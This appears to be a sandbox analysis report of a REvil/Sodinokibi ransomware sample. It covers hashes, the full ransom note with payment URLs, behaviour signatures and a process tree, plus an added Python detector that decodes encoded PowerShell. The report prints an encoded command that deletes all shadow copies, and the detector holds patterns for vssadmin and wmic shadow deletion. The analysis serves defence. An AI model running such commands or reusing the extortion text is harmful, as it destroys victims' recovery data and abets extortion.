Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-08-2023 07:35

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10

Malware Config

Extracted

Path

C:\Users\627o399m-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 627o399m. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5427461206FF740C
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/5427461206FF740C
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form: Key: csrwVepYyXqPuHQ85db3nmkFoO1WuIVQZVzkJvehUHHUUudUOjeQXwRbRa0YOQ3N 6EOPwAsOaTh1WFXePFk5Sx3D1xE3Lp7CeGySbprgEe7vLQjY3ka3cpOewjmHkKx9 c88ZbnY3OJXtMczvEEQLS4mb8BkSt7TulrPHZqleY1saCM2u5soj3yf/80yuNPYz L0EanGtDfJFxkLEhNKms5Nl11oHoUoMTmKUYAc4LM8xk3iWz7cbi9bhu4c1j21Ki +SGcUWdR+IDoIe50USRvkvfbgvpcL1x7lJ1I8D60Kj+8ZWqqxD4mM8IXSqlV7Ogg Ph/suWHzZUM0XNWOAOUdxLTkqcVhDvk5ZX9V4pV6AqLUlGLTnJUhXZf60ylee/PI WXvkPaMC9aitxSLS4UxPz/ykW1StaWaXHpjDrxK/A+MdlV95Qrq40Qg9LB2iF4Lw C6bHc7psCE1EurJwon/e3jroC25vaxwFmaGuTCb8OHLhgKbsfAYgRaxaUQWwVSIO ns0TyFeTe/ZNB1kSWMJPqfLKeWTiU+SCVTBywvL0BVcfHLU44yykNlQY2J8Kgp3i u5hgGhglWQxIvcqnLr6+/cg4jGZRVlMW5rI8NJoL/04cpEkbyUp90KviOyT5Afgp eW4RKvglmV93asZ1oj3pTTxQYR6LMyEIh5kcqgmytp8/AkUBRkS/0YuUQ+UMDKYA I5e2z1nj8ZlH1y4uy8l/6mx4ycPD8dkrtAszogA+17munV/K1WVHtNkJUVhb8uR4 7dYVAM3ywUtvA0QY8Ec5qJCppjbNYlbvk+umab1d8pkPLjPHT2OiW92XyfxRmprp SzuekwDmEfGhNUt3Fgf5zDuoxoa1Dgornukh+FebxhioKSVhPjE90um9RA8tuFjA M3JQTXhxaeAThAcPKuMD3y+w6bFekzVO3Ilb6/INWL7ZBqDSode6eBub93fpRQBp NVoQkv5a6ixwhqTfxyB0Re/OdJClZyV87VDA677YqSPTKCliz+mD1mf2Du/0zjeN 4Jo0xcrqWV6LMC5GeoDjgXaDLWNLwgVsjxuXtaidhJIvyeXNMHwo3+GQrxaBJ20R PyNRdsqNrhVOx6HE+0AMATOCAQuxr5YceeLDAty1VTTBSDkROk0hOR3xqS0JTlc2 fKj+KlCqTHrV0+aNWXRAf8xabzIJOS5XP8r35sHOleR/JmrU4lOpBg4f5L1g8PZx G8A25H/YZ8OIT7i5YRBu/JpaCHcD1JgO5Q4kCT3CZXoK2BpOafMQStGzuRU2IM62 wdTPq98+OEPyUjZfQ0RvRcgmA41lkXKjXmNDFWs6bhjmJf1GTYgB8zGm2g1mPMiM 4xIX7Gky+Kit4y2FbkQ6VOPVY5atSxsJ/Na8A894rTN4vYBM ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5427461206FF740C

http://decryptor.cc/5427461206FF740C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2064
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2988
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2384
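
The -e argument on the PID 2064 command line is a base64 encoding of a UTF-16LE PowerShell script. Decoding it gives the one-liner REvil uses to delete every Volume Shadow Copy through WMI, which is what brings vssvc.exe and the WMI callback sink unsecapp.exe into the process tree above. The helper below is an added example (my code, not part of the sandbox report): it pulls the blob out of any -EncodedCommand style argument, decodes it, and matches the result against shadow-copy-deletion patterns. The vssadmin and wmic patterns are included for completeness and were not observed in this run; the non-malicious command lines in the usage note are constructed inputs.

```python
import base64
import binascii
import re
from typing import Optional

# The exact command line recorded for PID 2064 in the process tree above.
SAMPLE_CMDLINE = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Shadow-copy deletion techniques commonly seen in ransomware (ATT&CK T1490, Inhibit System Recovery).
# Only the first pattern is present in this run; the other two are added for completeness.
SHADOW_COPY_PATTERNS = {
    "wmi_win32_shadowcopy_delete": re.compile(r"win32_shadowcopy.*?\.delete\s*\(", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
}


def is_encoded_command_flag(token: str) -> bool:
    """Accept the flag spellings powershell.exe resolves to -EncodedCommand.

    powershell.exe takes any prefix of 'encodedcommand' that starts with 'e'
    (-e, -en, -enc, ...) plus the alias -ec. Other flags starting with 'e'
    such as -ex / -ExecutionPolicy are not prefixes and are rejected.
    """
    if not token or token[0] not in "-/":
        return False
    flag = token[1:].lower()
    if flag == "ec":
        return True
    return flag.startswith("e") and "encodedcommand".startswith(flag)


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 blob following an -EncodedCommand style flag, or None."""
    tokens = cmdline.split()  # simplification: the sample has no quoted arguments
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_flag(tok):
            return tokens[i + 1]
    return None


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand payload (base64 over UTF-16LE)."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by loaders or loggers
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def shadow_copy_indicators(script: str) -> list:
    """Names of the shadow-copy deletion patterns present in a (decoded) script."""
    return [name for name, rx in SHADOW_COPY_PATTERNS.items() if rx.search(script)]


def analyse_cmdline(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and flag recovery-inhibition behaviour.

    If the line carries no encoded argument, the patterns are run over the raw
    command line so plain vssadmin/wmic invocations are caught as well.
    """
    blob = extract_encoded_argument(cmdline)
    decoded = decode_encoded_command(blob) if blob else None
    script = decoded if decoded is not None else cmdline
    return {
        "encoded": blob is not None,
        "decoded": decoded,
        "indicators": shadow_copy_indicators(script),
    }


if __name__ == "__main__":
    result = analyse_cmdline(SAMPLE_CMDLINE)
    # decoded -> Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    print("decoded :", result["decoded"])
    print("matches :", result["indicators"])
```

Run over the PID 2064 command line this yields the Win32_ShadowCopy deletion one-liner and the single indicator wmi_win32_shadowcopy_delete; a constructed line such as "vssadmin.exe delete shadows /all /quiet" is caught by the raw-command-line path, and "powershell -ExecutionPolicy Bypass -File x.ps1" is correctly not treated as encoded. Note that WMI-driven deletion leaves no vssadmin.exe process, so a detection that only watches for vssadmin or wmic misses this sample; the encoded-command decode plus the vssvc.exe child under a PowerShell parent is the signal to alert on.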

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\627o399m-readme.txt

      Filesize

      7KB

      MD5

      a8e4c6d66dcf2f8ed6c783cbdb484045

      SHA1

      c541214daa6eba88bbee248c45ce4343b569e68c

      SHA256

      b27f45c2dc553ac92894ad07b5ea20cb74a05baa97cf2f20ecfd230b521e7e4d

      SHA512

      c8b5a3ca36d7176c7828f2fb6cf5ef0f8affa30694c0cb5c97f053ab6a382b1614b9258f44f872f0c70e7b63444b8350eff271b91dd9646a7a1481610ad86630

    • memory/2064-58-0x000000001B340000-0x000000001B622000-memory.dmp

      Filesize

      2.9MB

    • memory/2064-59-0x0000000002220000-0x0000000002228000-memory.dmp

      Filesize

      32KB

    • memory/2064-62-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

    • memory/2064-61-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

    • memory/2064-60-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2064-63-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB

    • memory/2064-64-0x0000000002AE0000-0x0000000002B60000-memory.dmp

      Filesize

      512KB

    • memory/2064-65-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

      Filesize

      9.6MB